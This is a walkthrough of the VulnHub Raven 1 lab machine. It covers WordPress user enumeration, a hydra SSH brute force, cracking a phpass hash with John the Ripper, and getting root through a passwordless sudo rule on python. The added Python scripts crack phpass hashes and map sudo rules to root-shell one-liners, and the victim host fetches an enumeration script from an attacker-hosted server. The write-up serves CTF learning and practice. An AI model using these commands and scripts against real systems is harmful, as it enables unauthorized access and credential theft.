Vulnhub Raven 1 Walkthrough


Writeup for the Raven 1 machine from VulnHub. A directory-busting scan reveals a WordPress installation from which we can find two usernames. We can bruteforce the SSH credentials for one of these users with hydra to gain a low-privilege shell, which we use to discover a plaintext password for the MySQL database in the WordPress config file. Exploring the database reveals another password stored as a WordPress hash (phpass, salted and iterated MD5), which we can crack with JtR. From there, a sudo rule that lets that user run python as root without a password gives us a root shell.

Starting off with an nmap scan (default scripts, version detection, and output in all three formats under the basename Raven):
nmap -sC -sV -oA Raven 10.0.2.5

You can see that it's an Apache server running on port 80. Feel free to navigate to it in a web browser and click around for a bit. In the meantime, we should have some other scans going in the background.

Let's start with a directory-busting scan. I like gobuster, but feel free to use your tool of choice. Gobuster scan:
gobuster -u 10.0.2.5 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
(That is the gobuster 2 syntax; gobuster 3 puts the same options behind the dir subcommand.)

We discover a WordPress installation under /wordpress. We can run another directory-busting scan on that directory, and we can probe further with wpscan (the -e flag with no argument runs its default enumeration, which includes users):
wpscan --url http://10.0.2.5/wordpress -e --wp-content-dir wp-content

We gain two WordPress users. We could try to log into WordPress at 10.0.2.5/wordpress/wp-login.php, or try our luck with SSH. I prepared hydra and tried SSH first, since a shell will be more valuable if it ends up working. If it doesn't, we'll go ahead with WordPress. Either way, we need to create a text file with our users to feed into hydra. Since there are only two users, doing it manually is fine. I put them into a file called users.txt. Here's the command:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -e nsr -o hydra.log -t8 -f ssh://10.0.2.5
If you're using Kali, unzip whichever wordlist you decided to use first (rockyou ships as rockyou.txt.gz). I just used rockyou. The -e nsr option additionally tries an empty password, the username itself and the username reversed, and -f stops as soon as one valid pair is found. Hydra uses 16 parallel tasks by default, so I reduced it to 8. Too many parallel connections can cause errors or lock the service up; hydra itself warns that many SSH configurations limit concurrent sessions and recommends -t 4.

And with that, we get michael's SSH password and a low-privilege shell. Log in with ssh michael@10.0.2.5. Now we start enumerating again. Now that we have a shell, let's take a look at the WordPress folder, specifically wp-config.php. On the way there, I stumbled across flag 2 in /var/www/: flag2{fc3fd58dcdad9ab23faca6e9a36e581c}.

We find the credentials to log into the MySQL database: wp-config.php stores them in plaintext in its DB_USER and DB_PASSWORD defines. WordPress requires MySQL or MariaDB to work, so database credentials were bound to exist somewhere on the machine. Let's try logging in with the password we found.

And it worked. We get a prompt. Let's start poking around.

The wp_users table looks interesting. WordPress keeps its accounts there, with the login in user_login and the password hash in user_pass.


Here are our users again, but this time with their password hashes. We still don't have steven's account, so let's try cracking his password. These are WordPress hashes: the $P$ prefix marks phpass's portable format, which is MD5 with a salt and thousands of iterations, so a plain-MD5 lookup won't match them but a wordlist attack still will:

We'll be using JtR for this. First, we need to create a password file. Note the single quotes: the hash starts with $P$, and unquoted or in double quotes the shell would expand $P to nothing and silently corrupt the hash (which is how the leading $ goes missing in many writeups):
echo 'steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/' > steven.txt
Then point john at that file with the phpass format (--format=phpass) and the rockyou wordlist.
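To make "WordPress MD5 hash" concrete, here is an added example (not code from the original post, nor WordPress or phpass code) that reimplements the phpass portable scheme and runs a small wordlist attack over a constructed wp_users dump. The user rows and wordlist are made up for the example; the known-answer hash is the one shipped with phpass's own test program. The page's real hash is used only to show how the iteration count and salt are parsed out of the prefix.

```python
"""Crack WordPress (phpass "$P$") hashes pulled from wp_users.

The scheme: digest = md5(salt + password), then 2**count_log2 rounds of
digest = md5(digest + password), encoded with phpass's own alphabet and
appended to the 12-character setting ($P$ + count char + 8-char salt).
"""
import hashlib

# phpass alphabet; note it is NOT the standard base64 ordering.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def encode64(data):
    """phpass encode64: 3 bytes -> 4 chars, little-endian 6-bit groups."""
    out = []
    i, n = 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def parse_setting(stored):
    """Return (iteration count, salt bytes) from the 12-char prefix of a $P$ hash."""
    if stored[:3] not in ("$P$", "$H$") or len(stored) != 34:
        raise ValueError("not a phpass portable hash: %r" % stored)
    count_log2 = ITOA64.index(stored[3])
    if not 7 <= count_log2 <= 30:
        raise ValueError("count_log2 out of range")
    return 1 << count_log2, stored[4:12].encode()


def phpass_crypt(password, stored):
    """Hash `password` under the setting carried in `stored` (its first 12 chars)."""
    count, salt = parse_setting(stored)
    pw = password.encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(count):  # PHP's do/while runs exactly `count` times
        digest = hashlib.md5(digest + pw).digest()
    return stored[:12] + encode64(digest)


def check_password(password, stored):
    # Plain == is fine here: we already hold the hash, this is offline cracking.
    return phpass_crypt(password, stored) == stored


def crack_wp_users(rows, wordlist):
    """rows: iterable of (user_login, user_pass). Returns {login: password} for cracked ones."""
    found = {}
    for login, stored in rows:
        for candidate in wordlist:
            if check_password(candidate, stored):
                found[login] = candidate
                break
    return found


# Constructed wp_users dump. The hash is the vector from phpass's test
# program (password 'test12345'); the login and wordlist are made up.
WP_USERS = [("wp_admin", "$P$9IQRaTwmfeRo7ud9Fh4E2PdI0S3r.L0")]
WORDLIST = ["password", "123456", "test12345", "letmein"]

if __name__ == "__main__":
    print(parse_setting("$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/"))  # the page's hash: count and salt
    print(crack_wp_users(WP_USERS, WORDLIST))
```

The cost character after $P$ is why this is slower than raw MD5 (the page's hash uses B, i.e. 8192 rounds), and also why JtR needs --format=phpass rather than raw-md5; john does the same computation as above, just far faster.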

Cracked in 4 seconds with rockyou. Now we can log into steven's WordPress account, but let's try SSH first. Michael reused his password, so maybe Steven did as well. This whole machine seems to be an exercise in weak credentials anyway.

It worked. That's another user, so let's start enumerating again. Let's automate it this time with LinEnum.sh. On the attacking machine, host the script with python -m SimpleHTTPServer 9999 (on Python 3 that is python3 -m http.server 9999). On the victim machine, grab the file with wget or curl, pointing at the attacking machine's address and the port you chose (10.0.2.5 is the target itself, so that is not the address to use): wget http://<attacker-ip>:9999/LinEnum.sh or curl -O http://<attacker-ip>:9999/LinEnum.sh. Here's the important bit:

Turns out that steven can run python as root through sudo without a password. (We could get this same information with sudo -l while logged in as steven.) Since we can run python as root, and python can spawn a shell, we'll use it to spawn a root shell. Some other common programs that can spawn a shell are nmap, nc, vim and more; keep an eye out for these running with root permissions (NOPASSWD sudo rules, SUID bits) for an easy privesc. I'll use the python interpreter to spawn a shell:
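As an added example (not LinEnum's code or the original post's), here is the check a practitioner would want to automate for this step: parse the text that sudo -l prints, keep the NOPASSWD rules that run as root, and match each permitted binary against a small table of programs that can spawn a shell, producing the one-liner to run. SUDO_L below is constructed to mirror steven's rule on this box; the spawner table and its commands are assumptions drawn from common pentest usage, not something the box itself documents.

```python
"""Spot sudo rules that hand out a root shell without a password."""
import os
import re
import shlex

# basename -> command that turns "sudo <binary>" into an interactive root shell
# (assumed from common usage; verify on the target before relying on one).
SHELL_SPAWNERS = {
    "python": "sudo {bin} -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "python2": "sudo {bin} -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "python3": "sudo {bin} -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "perl": "sudo {bin} -e 'exec \"/bin/bash\";'",
    "vi": "sudo {bin} -c ':!/bin/bash'",
    "vim": "sudo {bin} -c ':!/bin/bash'",
    # Modern nmap has no --interactive, but its NSE engine still runs Lua.
    "nmap": "TF=$(mktemp); echo 'os.execute(\"/bin/bash\")' > $TF; sudo {bin} --script=$TF",
}

# One sudoers entry as printed by `sudo -l`: "(runas) [NOPASSWD:] cmd1, cmd2"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(NOPASSWD:|PASSWD:)?\s*(.+?)\s*$")


def parse_sudo_l(text):
    """Return the rules in `sudo -l` output as dicts: runas, nopasswd, commands."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True          # everything after this header is a rule
            continue
        if not in_rules:
            continue                 # skip the "Matching Defaults" section
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tag, cmds = m.groups()
        rules.append({
            "runas": runas.strip(),
            "nopasswd": tag == "NOPASSWD:",
            "commands": [c.strip() for c in cmds.split(",")],
        })
    return rules


def find_root_shells(text):
    """Return (binary, payload) pairs for NOPASSWD root rules on shell-spawning binaries."""
    hits = []
    for rule in parse_sudo_l(text):
        runas_user = rule["runas"].split(":")[0].strip()   # "(ALL : ALL)" -> "ALL"
        if not rule["nopasswd"] or runas_user not in ("ALL", "root"):
            continue
        for cmd in rule["commands"]:
            if cmd == "ALL":
                hits.append(("ALL", "sudo /bin/bash"))
                continue
            parts = shlex.split(cmd)
            if len(parts) != 1:
                continue             # sudoers pins the arguments, so a -c payload would be refused
            template = SHELL_SPAWNERS.get(os.path.basename(parts[0]))
            if template:
                hits.append((parts[0], template.format(bin=parts[0])))
    return hits


# Constructed `sudo -l` output, shaped like steven's on this box.
SUDO_L = """\
Matching Defaults entries for steven on Raven:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User steven may run the following commands on Raven:
    (ALL) NOPASSWD: /usr/bin/python
"""

if __name__ == "__main__":
    for binary, payload in find_root_shells(SUDO_L):
        print(binary, "->", payload)
```

The argument check matters in practice: a rule like (root) NOPASSWD: /usr/bin/python /opt/backup.py only lets you run that exact command line, so the interpreter is not a free root shell there (you would have to look at whether /opt/backup.py itself is writable instead).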

And with that, we get a root shell. Navigate to /root to grab flag 4, and that's the box.